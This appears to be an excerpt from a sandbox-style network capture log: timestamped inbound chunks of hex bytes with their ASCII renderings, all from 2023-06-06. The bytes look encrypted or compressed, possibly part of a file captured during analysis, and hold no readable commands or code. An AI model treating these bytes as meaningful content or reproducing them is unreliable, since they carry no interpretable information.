                                                                                                  2023-06-06 15:28:28 UTC943INData Raw: be ed c5 96 ad 72 64 60 9e 5d 9c f3 84 e8 3a 0a 67 12 c9 72 6b bd ff d6 ae bb f9 c0 cc bc 4f fd a9 53 33 d6 24 0d 68 4d e4 6b a1 d5 c8 b7 e8 49 f9 cd 78 3b e2 5e 5b 20 21 4d f4 ea 89 db 89 80 b2 e2 0d 78 1f e9 cf 4d b1 ef 33 41 0a 41 4e 37 3a d5 c2 ae 5d 9f 0f 69 f0 b3 d1 a5 34 e6 99 02 a7 ef 62 75 ee 23 88 6f 78 ea b3 6f d1 81 fd 27 de c4 55 0a 09 86 e4 eb 7e b6 e4 d7 5e ca f0 22 0a a0 4a 25 64 b1 f0 92 25 9d 89 2b 77 e2 78 33 ab 5b 77 40 65 cc 53 78 db 67 95 56 15 4f 35 99 5f 25 cd 77 c8 25 e4 f0 f8 cd 59 58 b0 7e b3 ae 7f 7f 11 39 07 30 4d 3f fb 9b e1 f5 fb ca fc b2 77 69 69 f5 4d 08 a0 11 43 77 68 04 48 ae 55 dd f5 41 71 43 88 2d 5e 7c ba 26 c3 d3 90 ca 35 85 09 b9 0d de 25 f9 41 f5 08 1c 1b 34 77 31 a5 2c ca 47 21 90 62 f4 8f 19 4a 2d 2e c6 1d 08 88
                                                                                                  Data Ascii: rd`]:grkOS3$hMkIx;^[ !MxM3AAN7:]i4bu#oxo'U~^"J%d%+wx3[w@eSxgVO5_%w%YX~90M?wiiMCwhHUAqC-^|&5%A4w1,G!bJ-.
                                                                                                  2023-06-06 15:28:28 UTC959INData Raw: b9 40 96 6f 13 a6 49 d0 e2 43 d4 4f 31 de 81 18 09 3f c0 ed e6 5b 95 77 31 80 16 bc 4c 52 f8 86 23 00 2a 90 98 39 16 35 a0 be 1a 78 7e b4 9a 4e d4 22 80 a0 d7 f7 14 59 90 50 1a b2 ab e0 0e 9f f7 ce c1 07 08 66 78 3d 7f df 35 d8 c6 77 63 0d 6c 70 6b fd f9 a6 b6 94 47 a5 63 7a 6e 38 c3 19 5b c2 41 0f ea 67 8a 78 01 cb 35 87 7a 25 50 80 0a ba 5a ca 3c af 27 c8 fa 9c 71 47 eb 63 05 b3 14 68 12 5e b8 6b 97 2b 4e 3a 23 7f 1d 33 e1 4d 40 5b 18 29 3e d3 78 69 38 4d 8e fe eb 33 ae 7a 01 d5 a1 52 bf 71 18 67 b0 2d 92 1f 61 92 03 b4 4f 07 f8 d1 3a 58 78 1f 65 67 ff 80 c4 05 be 8d 73 82 79 92 77 47 ca 89 ec 84 be 70 6e bd 0c 3c e9 91 40 ad 71 bd 9b 81 ee 2e 55 d9 31 eb 07 d2 80 2e 4e 46 15 8a b4 e4 a5 f5 f6 15 f4 1e 2e e0 72 05 4f 48 57 82 a9 27 42 7a 71 20 65 53 fc
                                                                                                  Data Ascii: @oICO1?[w1LR#*95x~N"YPfx=5wclpkGczn8[Agx5z%PZ<'qGch^k+N:#3M@[)>xi8M3zRqg-aO:XxegsywGpn<@q.U1.NF.rOHW'Bzq eS
                                                                                                  2023-06-06 15:28:28 UTC975INData Raw: fe c1 cc d3 c1 ab f5 9a f9 2b 2f 50 8c f9 2c 7b 64 ba 33 d8 e5 78 83 30 b6 5c 85 5d fc c5 a2 a1 3a b0 fa 9b dc f8 d9 b4 29 c4 cc 93 5f 72 45 02 13 a5 3f 23 df 90 5b 6e f7 25 54 2e 5d b7 7d 82 6e 49 89 ab ee d8 c0 9a 06 44 03 48 33 ae cf 54 6e 6b dd 43 fc 34 9c 9c 63 86 cd 0f 40 48 2c 8f 97 e1 58 e3 46 ef 42 b0 86 43 b5 10 e8 48 af 5c e1 de 7d ac 67 63 98 e6 90 c1 dc 20 2b 17 46 f5 ae 6a ce 46 a2 56 1e 80 39 6f 16 fa 72 69 d5 15 15 e3 b4 26 4d 1e 83 b3 89 6d 16 2a cc 97 e1 d7 35 d7 14 e3 4f 14 26 b8 71 55 50 13 9a c8 88 a4 96 88 81 20 6a b8 1a 4b 9c 69 17 e4 8b ef e8 e5 f7 48 b1 8a 3a dd 4b a1 ac 8b a4 04 1b 26 e1 7f a6 44 77 ab 09 90 ff 95 29 25 26 31 83 ce 71 27 64 8c cc 8a 41 d8 bd 3a 3e 8d 22 6c e5 e9 5f 5d 91 2b 2b b5 79 34 11 a7 34 76 9f ef c5 3e 81
                                                                                                  Data Ascii: +/P,{d3x0\]:)_rE?#[n%T.]}nIDH3TnkC4c@H,XFBCH\}gc +FjFV9ori&Mm*5O&qUP jKiH:K&Dw)%&1q'dA:>"l_]++y44v>
                                                                                                  2023-06-06 15:28:28 UTC991INData Raw: 13 73 d3 45 60 f9 c5 c2 08 8e ca 7f db a0 2f 72 91 52 3d ca 0f 1f 31 84 93 eb 33 9b cf aa ae cf 37 6c 37 15 b6 d1 26 0f 38 12 7b c0 cf 60 ab 09 bd 15 a1 20 b3 68 81 bf a8 c7 57 76 d9 88 a8 f0 ec 32 5f d4 b3 c6 d4 ed de 31 a5 91 13 2e b3 18 52 b2 fd 2a a1 5f c1 4d 87 ba 6e 65 34 5e 69 1d f9 e8 57 e8 36 42 81 e8 06 35 90 9e 54 d6 ee c5 70 01 c3 aa 72 06 02 f3 57 2d 26 9b 12 e4 2d ee cc 58 26 af 89 92 80 47 25 c6 f8 05 a9 ba 2e 8c bf 00 1f 9e ff 13 a0 61 22 95 22 c0 ba b9 ee 1c 48 10 03 73 16 15 01 31 c5 29 3f 45 df c8 da 06 49 63 9b 12 62 e4 14 b2 7e 1d e6 52 54 e9 b4 44 e7 f2 8f 0a 5c 2c 5d 10 2f 2e a3 f6 ac f4 6f 00 07 11 6a 30 01 09 1e 35 03 2c 62 47 f3 12 a6 32 b1 41 ff ae 31 15 57 a1 26 e1 f9 17 7d 24 22 5e f0 0b 46 fe c5 44 7d 15 b8 9a cb 98 a7 eb c5
                                                                                                  Data Ascii: sE`/rR=137l7&8{` hWv2_1.R*_Mne4^iW6B5TprW-&-X&G%.a""Hs1)?EIcb~RTD\,]/.oj05,bG2A1W&}$"^FD}
                                                                                                  2023-06-06 15:28:28 UTC1007INData Raw: 39 0e 83 1b e7 8d 32 58 eb 1c 78 0d 35 c0 e6 9e 22 a0 02 c9 e7 76 c0 7d 51 c7 31 f5 71 14 22 e8 fb c5 13 1f 16 4a 6d e2 01 c6 4f 09 04 c5 68 57 7f 75 be 2c 60 3e ec 0b 62 3d 29 87 1b d7 e5 e3 a7 c7 33 d3 59 73 62 38 a1 07 6c 71 bc 03 9d d7 73 e3 5e 05 8e 79 e7 e5 20 80 12 ea f2 5c 5c 94 73 bd 7e d8 a1 97 bc df 9a 5f 57 e8 f9 ea 46 a6 10 1c 64 ac a3 29 7a f7 df 4a fd f1 be 2a 9a 91 02 c8 b2 43 59 81 94 4f 3d 5c 79 23 d3 a3 5f b7 18 54 3f 28 0d 4a 99 5c 27 4c 11 68 f4 f2 44 61 fa ec 2e 1c 74 a5 b4 37 18 14 4d aa 04 cb 42 21 7e 73 04 46 e1 3e 19 32 35 db 69 45 80 d8 67 30 34 d8 fc 9b b4 0c 4e 7a d4 94 ab 02 96 9c 2e ab 5b 88 6c d1 78 35 ed 73 96 e2 9e a8 90 77 49 c3 0b f7 db 8e cc ce ef e5 8b 90 3f 1e fb f3 45 57 c4 93 27 ae 03 c9 87 d1 58 45 7b b5 eb a8 b8
                                                                                                  Data Ascii: 92Xx5"v}Q1q"JmOhWu,`>b=)3Ysb8lqs^y \\s~_WFd)zJ*CYO=\y#_T?(J\'LhDa.t7MB!~sF>25iEg04Nz.[lx5swI?EW'XE{
                                                                                                  2023-06-06 15:28:28 UTC1017INData Raw: 82 55 a9 03 58 83 76 34 8a 81 a7 87 ca 61 b1 2f d5 cd fa 0f db 08 39 68 3d d1 e6 56 88 4b 72 21 61 36 5d 6a 90 16 94 32 4e a4 5f d4 28 f9 a0 79 df 85 00 6b a4 99 a1 7b 9b 26 7c 83 c2 f8 de ba a9 e4 9b 7e 36 21 ce 4e 0d cf 68 7d 60 cb 79 3e 40 cb 7b 04 6e 06 f7 61 fc 04 fa 03 8d 92 ff 75 34 04 56 ca 59 91 2c 51 3c c9 6f 02 93 1d 8d 08 0f e3 54 60 d4 ed a4 e4 d3 2e 61 57 d6 65 83 34 e2 6c f4 e8 ab fc 8f 6c ab 87 5d a2 03 45 02 67 46 23 04 10 16 c3 e2 26 2f cb bc df cf 59 38 dc bf cc 3b 18 8f ff 90 1d a2 0d 2c 37 56 f8 31 ce ec ca 15 63 6b fe b3 4b a7 6f a6 78 6d cf e0 eb 85 4e 7f 6e 61 88 f2 c1 4c 90 3b f2 52 33 91 25 da 88 2b aa 86 4f 38 e2 1e 64 36 c6 52 1d 6d 0c 42 5b ca 27 f1 79 89 19 50 76 18 6e 27 f6 09 03 cb c2 3a 35 78 e5 46 3e 7f 36 19 70 cb 05 52
                                                                                                  Data Ascii: UXv4a/9h=VKr!a6]j2N_(yk{&|~6!Nh}`y>@{nau4VY,Q<oT`.aWe4ll]EgF#&/Y8;,7V1ckKoxmNnaL;R3%+O8d6RmB['yPvn':5xF>6pR
                                                                                                  2023-06-06 15:28:28 UTC1033INData Raw: b9 12 01 14 4a 08 26 55 38 17 93 78 79 f5 79 d1 c0 9d f0 8c 4e 1f 69 e4 56 7c 4c 8a 64 8b 22 6a 62 a0 bf 16 03 ab cd bc 15 54 7e 98 3d 84 ef 2e 02 d9 11 f5 ff 39 79 1d 02 dc 08 57 3d 26 b7 60 66 ca 87 52 c8 15 d5 9b bd 23 c9 8c b8 0c 66 89 68 43 c4 e3 ce f9 da 49 73 4d ab 54 29 b0 13 9e 47 cd 5c 48 be 04 9e 73 5f 4e 28 f4 37 e0 69 27 f1 de 81 41 eb a3 38 0a 61 60 f6 81 d4 98 4f c1 a3 c2 e7 12 4f 00 b7 13 05 4c 34 f6 ca d3 04 40 8b 54 c8 4a 39 b4 e8 26 63 0d 27 8e a9 00 d5 76 3f bc 00 ec e4 46 fb 9c 33 5c eb a6 50 fa 8a 97 e3 ad de 04 ac 38 ab 6a a0 05 43 33 4e 77 2b a9 37 04 31 fb 98 f6 42 b8 e5 f8 bb 0b 75 e5 bd b0 ae 3a 13 d9 7d 4a 02 58 db 5a ca 84 79 4b 7b 4e 10 8b f6 60 dc a5 09 cc b5 12 45 8c 51 28 fd 4b b7 5c ae 0c 29 ba 64 ab 68 3a dd 8f 5b 15 15
                                                                                                  Data Ascii: J&U8xyyNiV|Ld"jbT~=.9yW=&`fR#fhCIsMT)G\Hs_N(7i'A8a`OOL4@TJ9&c'v?F3\P8jC3Nw+71Bu:}JXZyK{N`EQ(K\)dh:[
                                                                                                  2023-06-06 15:28:28 UTC1049INData Raw: b6 55 fb e8 b8 f9 73 51 8d cc ed 62 9c 3c ae 2b 25 c0 6a 09 e4 5c 52 96 bb 50 65 03 38 59 bc f2 78 08 9f a1 40 09 0c 49 55 d5 71 96 2d 5f d6 cb 4e 82 31 69 b8 5c 03 50 9c 5e 6b 2c 2e 23 1b 74 ae 7c 4a e2 e4 27 6c a4 d6 82 b5 6a 1a c3 bb 68 53 5f ba 73 89 76 f2 c3 23 c5 a3 22 4e 1a ca 67 98 e5 5f d3 6f 97 80 0e 95 96 18 35 23 83 a1 c4 e2 2e 3e 8e 4a dd 99 cd ad 87 38 55 bc 07 a6 80 54 12 0e 57 95 4e 47 0c 06 dd 95 44 ed 2c 23 ec a9 ba b8 ae 76 d9 1f 8e aa 60 23 5e d6 17 e2 34 f9 73 f4 0e 86 c4 ee 7c 5b 63 01 28 fa be 9d 25 f2 bc 26 70 4c d8 8c ad b3 e4 8d 52 04 2c 6d fc 79 91 e8 63 20 e7 58 95 b4 06 f8 19 b0 17 7e 59 c1 d3 d8 a3 f0 e2 22 cb 9a ea 49 a3 2e c6 42 39 f6 09 41 8c d2 5e 1a 6e 49 cb 77 aa f9 27 cc 4e e7 e9 62 cf 73 b5 55 00 52 a7 32 ea f1 60 52
                                                                                                  Data Ascii: UsQb<+%j\RPe8Yx@IUq-_N1i\P^k,.#t|J'ljhS_sv#"Ng_o5#.>J8UTWNGD,#v`#^4s|[c(%&pLR,myc X~Y"I.B9A^nIw'NbsUR2`R
                                                                                                  2023-06-06 15:28:28 UTC1065INData Raw: 75 bb d9 a3 4d 08 de b6 ce ea 34 51 e6 ec 3a c8 1f 83 6f e8 fe 43 bd 95 ef b5 26 3a 17 90 1c 81 ba 55 80 31 e0 b8 ef ad 13 41 ff cc 2e a5 d2 6a 8a 16 de ea c8 82 00 cc f7 03 aa 7f 00 2c 97 88 5a 8d ef ba 51 56 00 07 e2 45 8f ab 97 f2 7b 69 1f 2e f8 16 02 c7 cb 0d 42 42 fb c0 ce dd 67 81 c4 ca 14 05 92 4f db ab c4 fb 46 2e 2b 2d a3 47 23 e5 e0 be 4d 0e 4c c5 52 4f b8 0b 3c 5f 48 67 87 be a8 55 c1 87 a1 f5 55 c1 c1 cb 0a 3c 28 6e cd b5 2f fd 22 35 01 d6 9c 9c 4b 0a c1 75 04 6b b4 53 5e e6 38 b7 da b0 86 0c 7e 27 96 60 a8 5a 84 a4 0d c8 f2 b8 ce 06 c5 d8 dc 66 4b d8 72 b0 4d 95 8b 4c 61 62 fb 59 45 d9 57 ee 65 d8 ba 2f 4d 25 68 01 aa 02 c7 04 ac 0e df 75 8e 7f 8a 38 d7 aa 49 b8 7b e6 04 ab 47 50 1a cf fe 8b f9 a5 c3 c7 8e 9e 58 b2 bb fe 6e 3b 77 77 c7 14 a0
                                                                                                  Data Ascii: uM4Q:oC&:U1A.j,ZQVE{i.BBgOF.+-G#MLRO<_HgUU<(n/"5KukS^8~'`ZfKrMLabYEWe/M%hu8I{GPXn;ww
                                                                                                  2023-06-06 15:28:28 UTC1081INData Raw: 9f 9e 07 a6 a1 a8 f5 87 a3 22 05 98 98 2a 60 21 85 3f 58 3a 40 1a 3b c2 20 00 23 02 0d 39 2f 21 67 8c 34 2b 26 3b 08 28 ae e4 5d 3c 7d 02 f0 e2 de 6c b2 20 5d b1 19 48 09 36 7b 6f f4 a7 39 1d d3 b6 58 b7 11 c2 81 82 42 ad d6 39 64 72 be 0b 39 4e 36 aa d2 01 69 b2 5d eb c0 5f 6e 41 a8 33 4a e2 26 5e 32 83 cf 34 ee 53 2a 12 69 9c d1 51 78 87 7a f6 d1 bc ac 03 15 63 e4 bd 93 cd 46 f1 17 cc 89 a3 bf ea f8 76 b2 3a 23 36 6f b0 e4 ba 23 8c 18 45 80 c2 ed 92 a5 5f e3 92 39 6f 7d 3e 31 9a 95 bf 27 2e 09 b2 bd cd 8e 46 1c da 53 6b 4e b2 b4 e1 26 e9 d5 f1 44 ff c1 7e 73 4c 3a 1d 88 01 0b a1 4b e9 6d ef 8a 14 2a 65 53 a8 c3 d6 82 e9 bb 5b c7 d0 91 7e ad 01 c2 30 62 76 57 c4 7a f3 f9 7d 04 86 2d 9c 2e 66 ac 15 7c ef 46 c6 56 c0 93 b4 ff 5e 78 fa b4 10 6e 72 43 16 4f
                                                                                                  Data Ascii: "*`!?X:@; #9/!g4+&;(]<}l ]H6{o9XB9dr9N6i]_nA3J&^24S*iQxzcFv:#6o#E_9o}>1'.FSkN&D~sL:Km*eS[~0bvWz}-.f|FV^xnrCO
                                                                                                  2023-06-06 15:28:28 UTC1097INData Raw: 8a df 8b fd 8c d5 6c 8a e7 6f a2 0a 31 b6 08 ee 00 8e ff 5f e7 8c 66 51 5e af b2 3c 1d 79 8c d0 1d 79 38 9e 35 dd f7 67 b9 8e de 28 28 c5 ce ea d0 0b 31 25 1d 7a d2 b3 20 d4 0a 4a a9 a9 cc 53 35 61 3b e4 c7 f5 b7 6a 0e 0f 85 88 e2 13 a3 4f 61 a6 9e 2f ea b6 e3 cf d6 8b 31 b5 6b 51 df 09 88 4e e5 59 75 d7 0f 90 a1 ae 14 63 99 79 28 00 b9 df 7a ca 82 10 9f 3e c7 51 73 fb e6 1c 6c 6f 15 84 50 46 00 62 c1 43 91 9f 26 82 97 ae 61 d4 2d 9c 13 fd 82 c6 b9 5b 5d 92 be 06 4b d0 aa 64 b8 d8 fd a2 bc d9 b9 81 ca 92 68 63 d5 92 19 9c b9 ac 5f 13 79 fc 1f 2e 73 6e 0b af d9 6d fc c6 94 95 6f dc 65 a5 41 a6 84 c8 2c ed 50 8d 91 c6 8f eb e3 89 c7 fb eb 74 66 a3 ce 8a a8 11 51 82 cb 79 28 4a 9f 99 91 fc 38 8d 25 5d 11 04 a3 4a a4 c6 de 11 77 fc 68 b6 bf 6e 67 57 4d c7 02
                                                                                                  Data Ascii: lo1_fQ^<yy85g((1%z JS5a;jOa/1kQNYucy(z>QsloPFbC&a-[]Kdhc_y.snmoeA,PtfQy(J8%]JwhngWM
                                                                                                  2023-06-06 15:28:28 UTC1113INData Raw: eb bd 61 b5 af d7 0b f3 ba db 08 48 cd 16 88 54 c5 f7 ad 97 ad 33 0c 20 ba df 0d a4 44 b3 96 30 65 93 4f 2a 31 e1 20 91 2b 8d ae 09 0c 6f 15 fe 9b 8d 87 84 43 cc b8 24 ee 7a 26 8a db 11 23 c2 6a 06 18 a0 ed 09 0e 36 25 4a e1 5b d4 4a dd 32 b5 3f 33 a3 5b 23 a7 99 af b0 f1 83 0f 1f 5d ec b4 b2 cd 81 30 87 30 c6 b7 1b 12 cf 15 9a 0e 5c 06 cf 61 19 18 74 3d 5e 8e a3 60 ea 8f 93 24 0a e1 97 c6 a3 2f e0 11 03 cd af 9d 65 47 71 d4 b3 ec c8 77 4f 82 f6 97 ed 2d 51 3d c1 3c d4 ae 53 d0 da 22 ae e5 8d 1c 4b ff fa da af 5e b4 46 fa b6 ea ac b2 5e 68 4f 39 a7 12 8b 4c c2 b0 b1 0a d3 de 50 78 fd 30 bd 52 f7 9a ae 9c 46 e1 30 14 fa d9 06 00 16 92 77 2d 5f 83 60 4c da 6e 91 22 0c 9b e6 04 97 0e 50 fa 02 28 8b 50 f2 2c d7 a2 09 02 46 30 8f d0 cd 3e 50 59 ff 1d 0a 68 22
                                                                                                  Data Ascii: aHT3 D0eO*1 +oC$z&#j6%J[J2?3[#]00\at=^`$/eGqwO-Q=<S"K^F^hO9LPx0RF0w-_`Ln"P(P,F0>PYh"
                                                                                                  2023-06-06 15:28:28 UTC1129INData Raw: c6 4d 0d 0e 20 24 fd 9d e1 92 20 63 0a 50 aa a7 f6 56 39 71 c4 ad d3 b1 95 38 89 41 3b fe f1 4d 44 df c9 6d 5a 5c 4a 5f 9d 48 b2 30 e7 ae 7a 20 5e 36 c2 a8 b9 1d ac 13 24 93 1e 45 23 d1 60 cb 5c eb ba 3c 4b ca 38 f3 b4 b3 97 90 3c 3e 64 fe af 1a 19 5b 28 15 1a c0 94 17 8f d7 57 fe ef 21 3d 88 ba 39 4d 8c f6 19 18 44 1c 18 5c 63 98 df e6 4d a2 3d 72 77 77 43 9e 2f 93 ad 79 18 df db 51 cb a1 79 8b bf 6e 1f ef 0b 00 0d 07 95 a9 80 d1 73 34 39 fc a2 87 15 48 9a 57 f8 08 b0 3b 58 8c 6d 1d 9f 3d 7f 1a aa 62 89 94 69 12 1a 4f e6 26 20 cd 56 6c 17 a8 da a7 d5 40 6b f6 ff b5 24 bd a3 fa 69 e2 d1 ba e6 c4 a2 cb 97 e6 11 35 01 3a 5f 7f ab 61 cf 16 aa 5e b4 23 57 28 bf 76 71 46 5b bd a9 b2 49 47 17 26 00 80 1d b7 be 70 c5 e0 a2 20 f0 1b 41 6d a7 9f fb cd 41 84 8f 4e
                                                                                                  Data Ascii: M $ cPV9q8A;MDmZ\J_H0z ^6$E#`\<K8<>d[(W!=9MD\cM=rwwC/yQyns49HW;Xm=biO& Vl@k$i5:_a^#W(vqF[IG&p AmAN
                                                                                                  2023-06-06 15:28:28 UTC1145INData Raw: 60 9f 35 f0 9e a1 d0 fd 4b a3 73 12 73 d5 34 5b c2 15 22 e3 06 13 b0 09 ae 27 0a c9 fd ff 49 ca ad 0d 88 d9 71 b6 3e f8 f2 be 37 65 e3 ed 5e df 8b 41 cd 9b b0 01 07 31 40 9e 89 14 a6 c0 2c e8 64 21 63 fb e9 ff b2 f7 fd 86 50 36 d0 c7 9a 95 69 f3 20 a3 47 25 d1 03 50 01 cf 88 42 ab a2 b2 ff 3c fb 19 7a dc 88 6e eb a8 40 19 f8 67 37 10 0d 66 f5 c2 95 39 da 90 ee 2d c3 91 30 d6 c0 97 26 08 ec 63 4e 3c 7c f0 7d 58 5a 73 f6 78 fe 29 1a a3 25 ce 05 77 c4 8e 2c 5c 58 76 94 09 f1 cf cc 59 ab db 0e 74 6f cd c8 58 27 2f 0e 1f 77 34 ee 35 76 70 5f fc b6 3d b7 2b e3 f2 b3 67 ef f2 49 f4 57 32 8a b9 20 9f 80 8c f4 10 1e 4a 42 2c 3f 4c 36 b0 5c ed 31 2a c2 75 8e a1 d6 9a 06 46 82 67 50 ab e0 87 e4 cd f7 ee 3e c3 7d d7 af 82 40 ee c4 95 3e c5 ed aa a9 a1 22 25 d8 f0 3f
                                                                                                  Data Ascii: `5Kss4["'Iq>7e^A1@,d!cP6i G%PB<zn@g7f9-0&cN<|}XZsx)%w,\XvYtoX'/w45vp_=+gIW2 JB,?L6\1*uFgP>}@>"%?
                                                                                                  2023-06-06 15:28:28 UTC1161INData Raw: d1 cd ee 5b a2 c5 de c2 6a d4 36 2d 37 d4 5e 95 f6 29 57 53 d4 82 ab 93 d5 ba 4f fb 4d a4 3e c1 74 12 f5 0d c5 43 36 9f 5d 30 9c 99 52 01 d6 97 70 34 1f c4 c0 18 a7 a5 f8 e9 64 9d e8 f5 ec 9f 65 64 8b 42 74 1e d1 4b 81 5a c8 ef 6b 97 56 20 6f 4d 5f ca 5b 9c 6d 52 e1 b1 40 1d 89 8b f5 73 be 80 7d ba 0a cc e5 6a 54 3b 19 9c 6c ee 43 b5 be 69 b3 a3 22 35 5e f0 89 60 a9 bd 05 1d 8a da d7 b3 26 94 9d 3d 7d 70 c1 48 55 5c d9 95 6e 7e 06 77 be ec 2c 1f 59 dd 0d 0e 8f 49 69 0b d1 ee 2c 0f df 78 90 70 77 8e f4 21 ee 30 bd 48 1a 18 ec 42 ac 73 3e 83 57 77 22 6a 61 33 6d 01 80 7a ec 85 20 ca 67 09 8a f5 b3 18 ed 14 bf c5 68 78 fe 56 d8 85 92 38 b5 af 59 d2 55 8c 7d 06 39 37 b3 43 4d 1a f3 38 e3 a5 a0 29 10 e0 f6 22 70 91 d9 9b db e9 2b f4 9b 73 7d d2 ad c7 75 9f da
                                                                                                  Data Ascii: [j6-7^)WSOM>tC6]0Rp4dedBtKZkV oM_[mR@s}jT;lCi"5^`&=}pHU\n~w,YIi,xpw!0HBs>Ww"ja3mz ghxV8YU}97CM8)"p+s}u
                                                                                                  2023-06-06 15:28:28 UTC1177INData Raw: bc f8 4c 99 ec 32 e7 e1 e8 3f c9 a6 ba cb f7 8f 6e 42 ab 0c 1a 79 43 9b 1f 80 d2 47 38 63 c3 d2 52 18 fc 92 23 89 51 43 31 1a 00 16 5c 81 b1 c1 37 63 1b 6c b0 e1 25 d0 44 e1 29 d2 43 46 4d b7 8c 15 f8 34 3e 00 2b 43 54 f6 9c 1b 67 9b 12 19 bb 0f 9f 1e 40 56 3a 1a 47 c0 c8 12 b0 4c ab 4d 36 51 c2 1d f5 58 f1 44 3c af 8a b9 3b 11 ca 35 96 85 39 98 f4 3f e1 06 c2 8e 71 d1 ef d8 ff ea 03 3a c1 41 28 a4 b3 7b 70 84 59 7b 83 ac e8 92 e1 d5 70 52 13 2c 58 b1 5e 5d f0 7b ca ca 24 4c e4 1d ba a7 c1 ce 4f a6 77 51 d4 b5 66 05 3a 02 e2 2b 3d 5c 46 3e d3 94 b1 f0 38 e1 27 8c be d3 7d ac f3 91 bb 94 6d f8 dc 68 24 db ea 24 a1 2a 40 d1 59 75 a8 4c 8a 6a e3 a0 fd 62 5f 63 a5 30 37 a5 4d 65 2d 37 b9 09 73 82 0e db 71 60 32 a8 f0 03 35 d5 6a ff e7 0b a0 e1 07 6d ec 91 d1
                                                                                                  Data Ascii: L2?nByCG8cR#QC1\7cl%D)CFM4>+CTg@V:GLM6QXD<;59?q:A({pY{pR,X^]{$LOwQf:+=\F>8'}mh$$*@YuLjb_c07Me-7sq`25jm
                                                                                                  2023-06-06 15:28:28 UTC1193INData Raw: 5b 94 3f 12 60 74 64 d6 21 b4 cc 4e 40 33 4c ac 48 0e f3 95 80 54 a6 39 f0 87 2b 7b 95 28 a7 c3 4d cc db 14 33 12 79 99 49 a1 74 c7 b9 58 c0 1e 3a 9e d3 97 88 55 95 d0 50 ae a3 0b 41 93 d5 dd 2f 77 ce 28 53 f6 e3 f8 36 8c 98 23 d2 be 7c c9 29 5f 65 a4 fe 15 93 c1 f5 e3 4c e2 0b 77 6c d4 0a 25 f2 03 34 41 85 9a 05 5d bc 77 eb 13 e4 95 6d 9b f9 d8 3f c1 d2 cd 4d 88 e0 58 15 f0 49 14 9b 7e ad 37 73 d7 6b d7 c2 6a d9 8c 95 94 be 9c 6e b3 93 28 10 88 f9 82 ac 4c 18 88 2e dc 99 41 aa 7d 0b eb 69 a2 70 3d 9d da c9 26 0f 84 ee f1 bc 9a f1 f4 fc 41 00 36 e8 84 70 67 6a 10 2f 66 87 91 d6 e3 00 6a d6 2e 86 d4 1c bc 0a 85 3c 6d 37 c9 19 44 1d aa d3 01 e9 7b a9 47 4c 5b 1a d3 b6 24 36 69 e2 0f e6 d4 e4 83 bb 9b 17 bb 90 09 39 9e 83 45 2c 3e fc 72 43 ca 13 8e 8f 3b 10
                                                                                                  Data Ascii: [?`td!N@3LHT9+{(M3yItX:UPA/w(S6#|)_eLwl%4A]wm?MXI~7skjn(L.A}ip=&A6pgj/fj.<m7D{GL[$6i9E,>rC;
                                                                                                  2023-06-06 15:28:28 UTC1209INData Raw: a3 9b 46 a7 3e 15 25 e7 c5 e7 ce 36 03 1c c4 ad 82 df 97 3e 50 61 1b e6 2b 2d 5c e2 f2 b4 6c 4c d3 a2 10 18 b9 37 fe 2d 66 8d 62 bf 4d f7 25 41 79 ae a1 62 46 fe a5 33 a6 b0 3c 1d 61 53 0e a8 5a a3 ab 9e 4f 24 a1 ff 16 4b 8e cf 40 a2 36 39 60 60 48 1d 45 30 ca 7b e0 00 cf 89 71 45 3d 24 9a b5 fe 90 15 e9 30 91 0e cd a5 cb 55 a9 fb 85 1a d0 51 b0 0f 8f 4a 7e ae ec 35 3c 9c 4f af f4 1a 1d c6 77 f7 3a 21 29 13 e7 62 bb 61 80 99 9d b2 67 1d dc a4 c7 ca 37 3e 30 a0 0d 28 20 cd bd 9e 70 52 8e 38 46 9f 96 42 44 6e 48 80 00 25 6e e4 68 00 42 a2 c4 a5 54 8d 34 60 4d 3a 2b d9 fd c2 73 24 0e b1 7f 3f 72 ae 3f e2 d9 58 ad 79 af 1f 85 85 99 1e 76 95 7d dc a6 5f bc 0f 4e a2 79 69 4e dc 6f 86 e5 05 a7 0f ca e0 41 9d 87 30 7c fd 4f 99 47 ad 5e d5 ff 4e 1d 2a cb 59 71 de
                                                                                                  Data Ascii: F>%6>Pa+-\lL7-fbM%AybF3<aSZO$K@69``HE0{qE=$0UQJ~5<Ow:!)bag7>0( pR8FBDnH%nhBT4`M:+s$?r?Xyv}_NyiNoA0|OG^N*Yq
                                                                                                  2023-06-06 15:28:28 UTC1225INData Raw: db c2 8e 43 fc 69 eb b6 28 10 9e 12 4f 41 fe ef 07 8b 95 e1 39 69 46 5d 76 0b ae 52 e1 66 84 21 f4 ab 92 9d 3b 51 fa 9b 06 11 68 85 c5 0f d2 3c 45 5b 8b da bd 21 18 36 7c b6 86 8a 67 26 04 4e f1 c7 b3 c2 aa 4b 96 24 df 81 ab c9 85 d5 8b a2 7f 45 b9 e7 2a 30 27 ac 8e 31 4e 7b 28 fb 51 b8 68 62 7d b6 f2 ae 42 e6 56 a8 89 c4 4e 5f 31 94 fa 3d 62 a1 ce e1 d8 ae d6 a3 74 b6 16 d4 10 0d 0d a6 1b 14 cf 9c 31 d6 9e 9d b9 5c 36 ba 6e 9f 7b fc 74 99 a6 60 ac b2 ff 3c fb c7 21 4b 5f 96 18 2b 73 08 33 82 fd a0 c9 4f d8 c2 e5 c8 ee 5e f1 02 4b 8e 7e 19 8b ed 1f 6c 01 9f 4a dc 9b 68 d3 85 6a 61 2c 08 ab 12 be f3 6a d6 d2 c2 dc f8 29 8a 08 8b 58 8e 9f e2 a3 30 f3 dd 2a 59 df 5d c8 46 db 5c fa 16 93 61 08 55 9d e9 09 45 87 9e 3c 0a 3c cb 5a 71 d7 db a1 c0 05 0e c8 4e c7
                                                                                                  Data Ascii: Ci(OA9iF]vRf!;Qh<E[!6|g&NK$E*0'1N{(Qhb}BVN_1=bt1\6n{t`<!K_+s3O^K~lJhja,j)X0*Y]F\aUE<<ZqN
